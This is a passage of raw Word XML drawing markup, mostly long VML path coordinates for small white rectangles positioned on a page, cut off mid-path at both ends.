,9469,2996,9474,2996,9478,2996,9482,2996,9486,2996,9491,2996,9495,2996,9500,2996,9504,2996,9509,2996,9514,2996,9519,2996,9524,2996,9529,2996,9534,2996,9540,2996,9545,2996,9551,2996,9556,2996,9562,2996,9568,2996,9574,2996,9580,2996,9586,2996,9592,2996,9599,2996,9599,2996,9599,2996,9599,2996,9599,2996,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2995,9599,2994,9599,2994,9599,2994,9599,2994,9599,2994,9599,2994,9599,2993,9599,2993,9599,2993,9599,2993,9599,2992,9599,2992,9599,2992,9599,2992,9599,2991,9599,2991,9599,2991,9599,2990,9599,2990,9599,2989,9599,2989,9599,2989,9599,2988,9599,2988,9599,2987,9599,2987,9599,2986,9599,2985,9599,2985,9599,2984,9599,2984,9599,2983,9599,2982,9599,2982,9599,2981,9599,2980,9599,2979,9599,2979,9599,2978,9599,2977,9599,2976,9599,2975,9599,2974,9599,2973,9599,2972,9599,2971,9599,2970,9599,2969,9599,2968,9599,2967,9599,2965,9599,2964,9599,2963,9599,2962,9599,2960,9599,2959,9599,2958,9599,2956,9599,2955,9599,2953,9599,2952,9599,2950,9599,2949,9599,2947,9599,2945,9599,2944,9599,2942,9599,2940,9599,2938,9599,2936,9599,2934,9599,2932,9599,2930,9599,2928,9599,2926,9599,2924,9599,2922,9599,2920,9599,2918,9599,2915,9599,2913,9599,2911,9599,2908,9599,2906,9599,2903,9599,2901,9599,2898,9599,2895,9599,2893,9599,2890,9599,2887,9599,2884,9599,2881,9599,2878,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9599,2875,9598,2875,9598,2875,9598,2875,9598,2875,9598,2875,9598,2875,9598,2875,9597,2875,9597,2875,9597,2875,9597,2875,9596,2875,9596,2875,9596,2875,9596,2875,9595,2875,9595,2875,9594,2875,9594,2875,9593,2875,9593,2875,9592,2875,9592,2875,9591,2875,9591,2875,9590,2875,9589,2875,9588,2875,9588,2875,9587,2875,9586,2875,9585,2875,9584,2875,9583,2875,9582,2875,9581,2875,9580,2875,9579,2875,9578,2875,9576,2875,9575,2875,9574,2875,9572,2875,9571,2875,9569,2875,9568,2875,9566,2875,9564,2875,9563,2875,9561,2875,9559,2875,9557,2875,9555,2875,9553,2875,9551,2875,9549,2875,9547,2875,9545,2875,9542,2875,9540,2875,9537,2875,9535,2875,9532,2875,9530,2875,9527,2875,9524,2875,9521,2875,9518,2875,9515,2875,9512,2875,9509,2875,9506,2875,9503,2875,9499,2875,9496,2875,9492,2875,9488,2875,9485,2875,9481,2875,9477,2875,9473,2875,9469,2875,9465,2875,9461,2875,9456,2875,9452,2875,9447,2875,9443,2875,9438,2875,9433,2875,9429,2875,9424,2875,9419,2875,9413,2875,9408,2875,9403,2875,9397,2875,9392,2875,9386,2875,9380,2875,9375,2875,9369,2875,9363,2875,9356,2875,9350,2875,9344e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:497.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,9950" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:9950;width:130;height:270" coordorigin="2370,9950" coordsize="130,270" path="m2395,9974l2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2395,9974,2396,9974,2396,9974,2396,9974,2396,9974,2396,9974,2396,9974,2396,9974,2396,9974,2396,9974,2396,9974,2397,9974,2397,9974,2397,9974,2397,9974,2397,9974,2398,9974,2398,9974,2398,9974,2398,9974,2399,9974,2399,9974,2399,9974,2399,9974,2400,9974,2400,9974,2400,9974,2401,9974,2401,9974,2402,9974,2402,9974,2403,9974,2403,9974,2404,9974,2404,9974,2405,9974,2405,9974,2406,9974,2406,9974,2407,9974,2408,9974,2408,9974,2409,9974,2410,9974,2411,9974,2411,9974,2412,9974,2413,9974,2414,9974,2415,9974,2416,9974,2417,9974,2418,9974,2419,9974,2420,9974,2421,9974,2422,9974,2423,9974,2424,9974,2425,9974,2426,9974,2428,9974,2429,9974,2430,9974,2432,9974,2433,9974,2434,9974,2436,9974,2437,9974,2439,9974,2441,9974,2442,9974,2444,9974,2445,9974,2447,9974,2449,9974,2451,9974,2453,9974,2454,9974,2456,9974,2458,9974,2460,9974,2462,9974,2464,9974,2466,9974,2469,9974,2471,9974,2473,9974,2475,9974,2478,9974,2480,9974,2482,9974,2485,9974,2487,9974,2490,9974,2493,9974,2495,9974,2498,9974,2501,9974,2504,9974,2506,9974,2509,9974,2512,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9974,2515,9975,2515,9975,2515,9975,2515,9975,2515,9975,2515,9975,2515,9975,2515,9976,2515,9976,2515,9976,2515,9976,2515,9977,2515,9977,2515,9977,2515,9978,2515,9978,2515,9979,2515,9979,2515,9979,2515,9980,2515,9981,2515,9981,2515,9982,2515,9982,2515,9983,2515,9984,2515,9984,2515,9985,2515,9986,2515,9987,2515,9988,2515,9989,2515,9990,2515,9991,2515,9992,2515,9993,2515,9994,2515,9995,2515,9997,2515,9998,2515,9999,2515,10001,2515,10002,2515,10004,2515,10005,2515,10007,2515,10008,2515,10010,2515,10012,2515,10014,2515,10016,2515,10018,2515,10020,2515,10022,2515,10024,2515,10026,2515,10028,2515,10031,2515,10033,2515,10035,2515,10038,2515,10040,2515,10043,2515,10046,2515,10049,2515,10052,2515,10054,2515,10057,2515,10061,2515,10064,2515,10067,2515,10070,2515,10074,2515,10077,2515,10081,2515,10084,2515,10088,2515,10092,2515,10096,2515,10100,2515,10104,2515,10108,2515,10112,2515,10117,2515,10121,2515,10125,2515,10130,2515,10135,2515,10139,2515,10144,2515,10149,2515,10154,2515,10159,2515,10165,2515,10170,2515,10176,2515,10181,2515,10187,2515,10192,2515,10198,2515,10204,2515,10210,2515,10217,2515,10223,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2515,10229,2514,10229,2514,10229,2514,10229,2514,10229,2514,10229,2514,10229,2514,10229,2513,10229,2513,10229,2513,10229,2513,10229,2512,10229,2512,10229,2512,10229,2512,10229,2511,10229,2511,10229,2511,10229,2510,10229,2510,10229,2510,10229,2509,10229,2509,10229,2508,10229,2508,10229,2507,10229,2507,10229,2506,10229,2506,10229,2505,10229,2505,10229,2504,10229,2503,10229,2503,10229,2502,10229,2501,10229,2501,10229,2500,10229,2499,10229,2498,10229,2497,10229,2497,10229,2496,10229,2495,10229,2494,10229,2493,10229,2492,10229,2491,10229,2490,10229,2489,10229,2488,10229,2486,10229,2485,10229,2484,10229,2483,10229,2481,10229,2480,10229,2479,10229,2477,10229,2476,10229,2475,10229,2473,10229,2472,10229,2470,10229,2468,10229,2467,10229,2465,10229,2463,10229,2462,10229,2460,10229,2458,10229,2456,10229,2454,10229,2452,10229,2450,10229,2448,10229,2446,10229,2444,10229,2442,10229,2440,10229,2437,10229,2435,10229,2433,10229,2430,10229,2428,10229,2426,10229,2423,10229,2420,10229,2418,10229,2415,10229,2412,10229,2410,10229,2407,10229,2404,10229,2401,10229,2398,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10229,2395,10228,2395,10228,2395,10228,2395,10228,2395,10228,2395,10228,2395,10227,2395,10227,2395,10227,2395,10226,2395,10226,2395,10226,2395,10225,2395,10225,2395,10225,2395,10224,2395,10224,2395,10223,2395,10223,2395,10222,2395,10221,2395,10221,2395,10220,2395,10219,2395,10219,2395,10218,2395,10217,2395,10216,2395,10215,2395,10214,2395,10213,2395,10212,2395,10211,2395,10210,2395,10209,2395,10208,2395,10207,2395,10205,2395,10204,2395,10203,2395,10201,2395,10200,2395,10198,2395,10196,2395,10195,2395,10193,2395,10191,2395,10189,2395,10188,2395,10186,2395,10184,2395,10182,2395,10179,2395,10177,2395,10175,2395,10173,2395,10170,2395,10168,2395,10165,2395,10163,2395,10160,2395,10157,2395,10155,2395,10152,2395,10149,2395,10146,2395,10143,2395,10139,2395,10136,2395,10133,2395,10129,2395,10126,2395,10122,2395,10119,2395,10115,2395,10111,2395,10107,2395,10103,2395,10099,2395,10095,2395,10091,2395,10087,2395,10082,2395,10078,2395,10073,2395,10068,2395,10064,2395,10059,2395,10054,2395,10049,2395,10044,2395,10038,2395,10033,2395,10028,2395,10022,2395,10016,2395,10011,2395,10005,2395,9999,2395,9993,2395,9987,2395,9980,2395,9974e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:497.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,9950" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:9950;width:130;height:270" coordorigin="2850,9950" coordsize="130,270" path="m2875,9974l2875,9974,2875,9974,2875,9974,2875,9974,2875,9974,2875,9974,2875,9974,2875,9974,2875,9974,2875,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2876,9974,2877,9974,2877,9974,2877,9974,2877,9974,2877,9974,2877,9974,2878,9974,2878,9974,2878,9974,2878,9974,2879,9974,2879,9974,2879,9974,2879,9974,2880,9974,2880,9974,2880,9974,2881,9974,2881,9974,2882,9974,2882,9974,2882,9974,2883,9974,2883,9974,2884,9974,2884,9974,2885,9974,2885,9974,2886,9974,2887,9974,2887,9974,2888,9974,2889,9974,2889,9974,2890,9974,2891,9974,2892,9974,2892,9974,2893,9974,2894,9974,2895,9974,2896,9974,2897,9974,2898,9974,2899,9974,2900,9974,2901,9974,2902,9974,2903,9974,2904,9974,2906,9974,2907,9974,2908,9974,2909,9974,2911,9974,2912,9974,2913,9974,2915,9974,2916,9974,2918,9974,2919,9974,2921,9974,2922,9974,2924,9974,2926,9974,2927,9974,2929,9974,2931,9974,2933,9974,2935,9974,2937,9974,2938,9974,2940,9974,2943,9974,2945,9974,2947,9974,2949,9974,2951,9974,2953,9974,2956,9974,2958,9974,2960,9974,2963,9974,2965,9974,2968,9974,2970,9974,2973,9974,2976,9974,2978,9974,2981,9974,2984,9974,2987,9974,2990,9974,2993,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9974,2996,9975,2996,9975,2996,9975,2996,9975,2996,9975,2996,9975,2996,9975,2996,9976,2996,9976,2996,9976,2996,9976,2996,9977,2996,9977,2996,9977,2996,9978,2996,9978,2996,9979,2996,9979,2996,9979,2996,9980,2996,9981,2996,9981,2996,9982,2996,9982,2996,9983,2996,9984,2996,9984,2996,9985,2996,9986,2996,9987,2996,9988,2996,9989,2996,9990,2996,9991,2996,9992,2996,9993,2996,9994,2996,9995,2996,9997,2996,9998,2996,9999,2996,10001,2996,10002,2996,10004,2996,10005,2996,10007,2996,10008,2996,10010,2996,10012,2996,10014,2996,10016,2996,10018,2996,10020,2996,10022,2996,10024,2996,10026,2996,10028,2996,10031,2996,10033,2996,10035,2996,10038,2996,10040,2996,10043,2996,10046,2996,10049,2996,10052,2996,10054,2996,10057,2996,10061,2996,10064,2996,10067,2996,10070,2996,10074,2996,10077,2996,10081,2996,10084,2996,10088,2996,10092,2996,10096,2996,10100,2996,10104,2996,10108,2996,10112,2996,10117,2996,10121,2996,10125,2996,10130,2996,10135,2996,10139,2996,10144,2996,10149,2996,10154,2996,10159,2996,10165,2996,10170,2996,10176,2996,10181,2996,10187,2996,10192,2996,10198,2996,10204,2996,10210,2996,10217,2996,10223,2996,10229,2996,10229,2996,10229,2996,10229,2996,10229,2996,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2995,10229,2994,10229,2994,10229,2994,10229,2994,10229,2994,10229,2994,10229,2993,10229,2993,10229,2993,10229,2993,10229,2992,10229,2992,10229,2992,10229,2992,10229,2991,10229,2991,10229,2991,10229,2990,10229,2990,10229,2989,10229,2989,10229,2989,10229,2988,10229,2988,10229,2987,10229,2987,10229,2986,10229,2985,10229,2985,10229,2984,10229,2984,10229,2983,10229,2982,10229,2982,10229,2981,10229,2980,10229,2979,10229,2979,10229,2978,10229,2977,10229,2976,10229,2975,10229,2974,10229,2973,10229,2972,10229,2971,10229,2970,10229,2969,10229,2968,10229,2967,10229,2965,10229,2964,10229,2963,10229,2962,10229,2960,10229,2959,10229,2958,10229,2956,10229,2955,10229,2953,10229,2952,10229,2950,10229,2949,10229,2947,10229,2945,10229,2944,10229,2942,10229,2940,10229,2938,10229,2936,10229,2934,10229,2932,10229,2930,10229,2928,10229,2926,10229,2924,10229,2922,10229,2920,10229,2918,10229,2915,10229,2913,10229,2911,10229,2908,10229,2906,10229,2903,10229,2901,10229,2898,10229,2895,10229,2893,10229,2890,10229,2887,10229,2884,10229,2881,10229,2878,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10229,2875,10228,2875,10228,2875,10228,2875,10228,2875,10228,2875,10228,2875,10227,2875,10227,2875,10227,2875,10226,2875,10226,2875,10226,2875,10225,2875,10225,2875,10225,2875,10224,2875,10224,2875,10223,2875,10223,2875,10222,2875,10221,2875,10221,2875,10220,2875,10219,2875,10219,2875,10218,2875,10217,2875,10216,2875,10215,2875,10214,2875,10213,2875,10212,2875,10211,2875,10210,2875,10209,2875,10208,2875,10207,2875,10205,2875,10204,2875,10203,2875,10201,2875,10200,2875,10198,2875,10196,2875,10195,2875,10193,2875,10191,2875,10189,2875,10188,2875,10186,2875,10184,2875,10182,2875,10179,2875,10177,2875,10175,2875,10173,2875,10170,2875,10168,2875,10165,2875,10163,2875,10160,2875,10157,2875,10155,2875,10152,2875,10149,2875,10146,2875,10143,2875,10139,2875,10136,2875,10133,2875,10129,2875,10126,2875,10122,2875,10119,2875,10115,2875,10111,2875,10107,2875,10103,2875,10099,2875,10095,2875,10091,2875,10087,2875,10082,2875,10078,2875,10073,2875,10068,2875,10064,2875,10059,2875,10054,2875,10049,2875,10044,2875,10038,2875,10033,2875,10028,2875,10022,2875,10016,2875,10011,2875,10005,2875,9999,2875,9993,2875,9987,2875,9980,2875,9974e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:529.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,10590" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:10590;width:130;height:270" coordorigin="2370,10590" coordsize="130,270" path="m2395,10619l2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2395,10619,2396,10619,2396,10619,2396,10619,2396,10619,2396,10619,2396,10619,2396,10619,2396,10619,2396,10619,2396,10619,2397,10619,2397,10619,2397,10619,2397,10619,2397,10619,2398,10619,2398,10619,2398,10619,2398,10619,2399,10619,2399,10619,2399,10619,2399,10619,2400,10619,2400,10619,2400,10619,2401,10619,2401,10619,2402,10619,2402,10619,2403,10619,2403,10619,2404,10619,2404,10619,2405,10619,2405,10619,2406,10619,2406,10619,2407,10619,2408,10619,2408,10619,2409,10619,2410,10619,2411,10619,2411,10619,2412,10619,2413,10619,2414,10619,2415,10619,2416,10619,2417,10619,2418,10619,2419,10619,2420,10619,2421,10619,2422,10619,2423,10619,2424,10619,2425,10619,2426,10619,2428,10619,2429,10619,2430,10619,2432,10619,2433,10619,2434,10619,2436,10619,2437,10619,2439,10619,2441,10619,2442,10619,2444,10619,2445,10619,2447,10619,2449,10619,2451,10619,2453,10619,2454,10619,2456,10619,2458,10619,2460,10619,2462,10619,2464,10619,2466,10619,2469,10619,2471,10619,2473,10619,2475,10619,2478,10619,2480,10619,2482,10619,2485,10619,2487,10619,2490,10619,2493,10619,2495,10619,2498,10619,2501,10619,2504,10619,2506,10619,2509,10619,2512,10619,2515,10619,2515,10619,2515,10619,2515,10619,2515,10619,2515,10619,2515,10619,2515,10619,2515,10619,2515,10619,2515,10619,2515,10620,2515,10620,2515,10620,2515,10620,2515,10620,2515,10620,2515,10620,2515,10620,2515,10620,2515,10620,2515,10621,2515,10621,2515,10621,2515,10621,2515,10621,2515,10622,2515,10622,2515,10622,2515,10623,2515,10623,2515,10623,2515,10624,2515,10624,2515,10625,2515,10625,2515,10626,2515,10626,2515,10627,2515,10628,2515,10628,2515,10629,2515,10630,2515,10631,2515,10631,2515,10632,2515,10633,2515,10634,2515,10635,2515,10636,2515,10637,2515,10638,2515,10639,2515,10641,2515,10642,2515,10643,2515,10645,2515,10646,2515,10647,2515,10649,2515,10650,2515,10652,2515,10654,2515,10655,2515,10657,2515,10659,2515,10661,2515,10663,2515,10665,2515,10667,2515,10669,2515,10671,2515,10674,2515,10676,2515,10678,2515,10681,2515,10683,2515,10686,2515,10688,2515,10691,2515,10694,2515,10697,2515,10700,2515,10703,2515,10706,2515,10709,2515,10712,2515,10716,2515,10719,2515,10723,2515,10726,2515,10730,2515,10733,2515,10737,2515,10741,2515,10745,2515,10749,2515,10753,2515,10758,2515,10762,2515,10766,2515,10771,2515,10775,2515,10780,2515,10785,2515,10790,2515,10795,2515,10800,2515,10805,2515,10810,2515,10815,2515,10821,2515,10826,2515,10832,2515,10838,2515,10844,2515,10850,2515,10856,2515,10862,2515,10868,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2515,10874,2514,10874,2514,10874,2514,10874,2514,10874,2514,10874,2514,10874,2514,10874,2513,10874,2513,10874,2513,10874,2513,10874,2512,10874,2512,10874,2512,10874,2512,10874,2511,10874,2511,10874,2511,10874,2510,10874,2510,10874,2510,10874,2509,10874,2509,10874,2508,10874,2508,10874,2507,10874,2507,10874,2506,10874,2506,10874,2505,10874,2505,10874,2504,10874,2503,10874,2503,10874,2502,10874,2501,10874,2501,10874,2500,10874,2499,10874,2498,10874,2497,10874,2497,10874,2496,10874,2495,10874,2494,10874,2493,10874,2492,10874,2491,10874,2490,10874,2489,10874,2488,10874,2486,10874,2485,10874,2484,10874,2483,10874,2481,10874,2480,10874,2479,10874,2477,10874,2476,10874,2475,10874,2473,10874,2472,10874,2470,10874,2468,10874,2467,10874,2465,10874,2463,10874,2462,10874,2460,10874,2458,10874,2456,10874,2454,10874,2452,10874,2450,10874,2448,10874,2446,10874,2444,10874,2442,10874,2440,10874,2437,10874,2435,10874,2433,10874,2430,10874,2428,10874,2426,10874,2423,10874,2420,10874,2418,10874,2415,10874,2412,10874,2410,10874,2407,10874,2404,10874,2401,10874,2398,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10874,2395,10873,2395,10873,2395,10873,2395,10873,2395,10873,2395,10872,2395,10872,2395,10872,2395,10871,2395,10871,2395,10871,2395,10870,2395,10870,2395,10870,2395,10869,2395,10869,2395,10868,2395,10867,2395,10867,2395,10866,2395,10865,2395,10865,2395,10864,2395,10863,2395,10862,2395,10862,2395,10861,2395,10860,2395,10859,2395,10858,2395,10857,2395,10856,2395,10854,2395,10853,2395,10852,2395,10851,2395,10849,2395,10848,2395,10846,2395,10845,2395,10843,2395,10842,2395,10840,2395,10838,2395,10837,2395,10835,2395,10833,2395,10831,2395,10829,2395,10827,2395,10825,2395,10823,2395,10820,2395,10818,2395,10816,2395,10813,2395,10811,2395,10808,2395,10805,2395,10803,2395,10800,2395,10797,2395,10794,2395,10791,2395,10788,2395,10785,2395,10781,2395,10778,2395,10775,2395,10771,2395,10768,2395,10764,2395,10760,2395,10757,2395,10753,2395,10749,2395,10745,2395,10741,2395,10736,2395,10732,2395,10728,2395,10723,2395,10718,2395,10714,2395,10709,2395,10704,2395,10699,2395,10694,2395,10689,2395,10684,2395,10678,2395,10673,2395,10667,2395,10662,2395,10656,2395,10650,2395,10644,2395,10638,2395,10632,2395,10626,2395,10619e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:529.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,10590" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:10590;width:130;height:270" coordorigin="2850,10590" coordsize="130,270" path="m2875,10619l2875,10619,2875,10619,2875,10619,2875,10619,2875,10619,2875,10619,2875,10619,2875,10619,2875,10619,2875,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2876,10619,2877,10619,2877,10619,2877,10619,2877,10619,2877,10619,2877,10619,2878,10619,2878,10619,2878,10619,2878,10619,2879,10619,2879,10619,2879,10619,2879,10619,2880,10619,2880,10619,2880,10619,2881,10619,2881,10619,2882,10619,2882,10619,2882,10619,2883,10619,2883,10619,2884,10619,2884,10619,2885,10619,2885,10619,2886,10619,2887,10619,2887,10619,2888,10619,2889,10619,2889,10619,2890,10619,2891,10619,2892,10619,2892,10619,2893,10619,2894,10619,2895,10619,2896,10619,2897,10619,2898,10619,2899,10619,2900,10619,2901,10619,2902,10619,2903,10619,2904,10619,2906,10619,2907,10619,2908,10619,2909,10619,2911,10619,2912,10619,2913,10619,2915,10619,2916,10619,2918,10619,2919,10619,2921,10619,2922,10619,2924,10619,2926,10619,2927,10619,2929,10619,2931,10619,2933,10619,2935,10619,2937,10619,2938,10619,2940,10619,2943,10619,2945,10619,2947,10619,2949,10619,2951,10619,2953,10619,2956,10619,2958,10619,2960,10619,2963,10619,2965,10619,2968,10619,2970,10619,2973,10619,2976,10619,2978,10619,2981,10619,2984,10619,2987,10619,2990,10619,2993,10619,2996,10619,2996,10619,2996,10619,2996,10619,2996,10619,2996,10619,2996,10619,2996,10619,2996,10619,2996,10619,2996,10619,2996,10620,2996,10620,2996,10620,2996,10620,2996,10620,2996,10620,2996,10620,2996,10620,2996,10620,2996,10620,2996,10621,2996,10621,2996,10621,2996,10621,2996,10621,2996,10622,2996,10622,2996,10622,2996,10623,2996,10623,2996,10623,2996,10624,2996,10624,2996,10625,2996,10625,2996,10626,2996,10626,2996,10627,2996,10628,2996,10628,2996,10629,2996,10630,2996,10631,2996,10631,2996,10632,2996,10633,2996,10634,2996,10635,2996,10636,2996,10637,2996,10638,2996,10639,2996,10641,2996,10642,2996,10643,2996,10645,2996,10646,2996,10647,2996,10649,2996,10650,2996,10652,2996,10654,2996,10655,2996,10657,2996,10659,2996,10661,2996,10663,2996,10665,2996,10667,2996,10669,2996,10671,2996,10674,2996,10676,2996,10678,2996,10681,2996,10683,2996,10686,2996,10688,2996,10691,2996,10694,2996,10697,2996,10700,2996,10703,2996,10706,2996,10709,2996,10712,2996,10716,2996,10719,2996,10723,2996,10726,2996,10730,2996,10733,2996,10737,2996,10741,2996,10745,2996,10749,2996,10753,2996,10758,2996,10762,2996,10766,2996,10771,2996,10775,2996,10780,2996,10785,2996,10790,2996,10795,2996,10800,2996,10805,2996,10810,2996,10815,2996,10821,2996,10826,2996,10832,2996,10838,2996,10844,2996,10850,2996,10856,2996,10862,2996,10868,2996,10874,2996,10874,2996,10874,2996,10874,2996,10874,2996,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2995,10874,2994,10874,2994,10874,2994,10874,2994,10874,2994,10874,2994,10874,2993,10874,2993,10874,2993,10874,2993,10874,2992,10874,2992,10874,2992,10874,2992,10874,2991,10874,2991,10874,2991,10874,2990,10874,2990,10874,2989,10874,2989,10874,2989,10874,2988,10874,2988,10874,2987,10874,2987,10874,2986,10874,2985,10874,2985,10874,2984,10874,2984,10874,2983,10874,2982,10874,2982,10874,2981,10874,2980,10874,2979,10874,2979,10874,2978,10874,2977,10874,2976,10874,2975,10874,2974,10874,2973,10874,2972,10874,2971,10874,2970,10874,2969,10874,2968,10874,2967,10874,2965,10874,2964,10874,2963,10874,2962,10874,2960,10874,2959,10874,2958,10874,2956,10874,2955,10874,2953,10874,2952,10874,2950,10874,2949,10874,2947,10874,2945,10874,2944,10874,2942,10874,2940,10874,2938,10874,2936,10874,2934,10874,2932,10874,2930,10874,2928,10874,2926,10874,2924,10874,2922,10874,2920,10874,2918,10874,2915,10874,2913,10874,2911,10874,2908,10874,2906,10874,2903,10874,2901,10874,2898,10874,2895,10874,2893,10874,2890,10874,2887,10874,2884,10874,2881,10874,2878,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10874,2875,10873,2875,10873,2875,10873,2875,10873,2875,10873,2875,10872,2875,10872,2875,10872,2875,10871,2875,10871,2875,10871,2875,10870,2875,10870,2875,10870,2875,10869,2875,10869,2875,10868,2875,10867,2875,10867,2875,10866,2875,10865,2875,10865,2875,10864,2875,10863,2875,10862,2875,10862,2875,10861,2875,10860,2875,10859,2875,10858,2875,10857,2875,10856,2875,10854,2875,10853,2875,10852,2875,10851,2875,10849,2875,10848,2875,10846,2875,10845,2875,10843,2875,10842,2875,10840,2875,10838,2875,10837,2875,10835,2875,10833,2875,10831,2875,10829,2875,10827,2875,10825,2875,10823,2875,10820,2875,10818,2875,10816,2875,10813,2875,10811,2875,10808,2875,10805,2875,10803,2875,10800,2875,10797,2875,10794,2875,10791,2875,10788,2875,10785,2875,10781,2875,10778,2875,10775,2875,10771,2875,10768,2875,10764,2875,10760,2875,10757,2875,10753,2875,10749,2875,10745,2875,10741,2875,10736,2875,10732,2875,10728,2875,10723,2875,10718,2875,10714,2875,10709,2875,10704,2875,10699,2875,10694,2875,10689,2875,10684,2875,10678,2875,10673,2875,10667,2875,10662,2875,10656,2875,10650,2875,10644,2875,10638,2875,10632,2875,10626,2875,10619e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:561.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,11230" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:11230;width:130;height:270" coordorigin="2370,11230" coordsize="130,270" path="m2395,11250l2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2395,11250,2396,11250,2396,11250,2396,11250,2396,11250,2396,11250,2396,11250,2396,11250,2396,11250,2396,11250,2396,11250,2397,11250,2397,11250,2397,11250,2397,11250,2397,11250,2398,11250,2398,11250,2398,11250,2398,11250,2399,11250,2399,11250,2399,11250,2399,11250,2400,11250,2400,11250,2400,11250,2401,11250,2401,11250,2402,11250,2402,11250,2403,11250,2403,11250,2404,11250,2404,11250,2405,11250,2405,11250,2406,11250,2406,11250,2407,11250,2408,11250,2408,11250,2409,11250,2410,11250,2411,11250,2411,11250,2412,11250,2413,11250,2414,11250,2415,11250,2416,11250,2417,11250,2418,11250,2419,11250,2420,11250,2421,11250,2422,11250,2423,11250,2424,11250,2425,11250,2426,11250,2428,11250,2429,11250,2430,11250,2432,11250,2433,11250,2434,11250,2436,11250,2437,11250,2439,11250,2441,11250,2442,11250,2444,11250,2445,11250,2447,11250,2449,11250,2451,11250,2453,11250,2454,11250,2456,11250,2458,11250,2460,11250,2462,11250,2464,11250,2466,11250,2469,11250,2471,11250,2473,11250,2475,11250,2478,11250,2480,11250,2482,11250,2485,11250,2487,11250,2490,11250,2493,11250,2495,11250,2498,11250,2501,11250,2504,11250,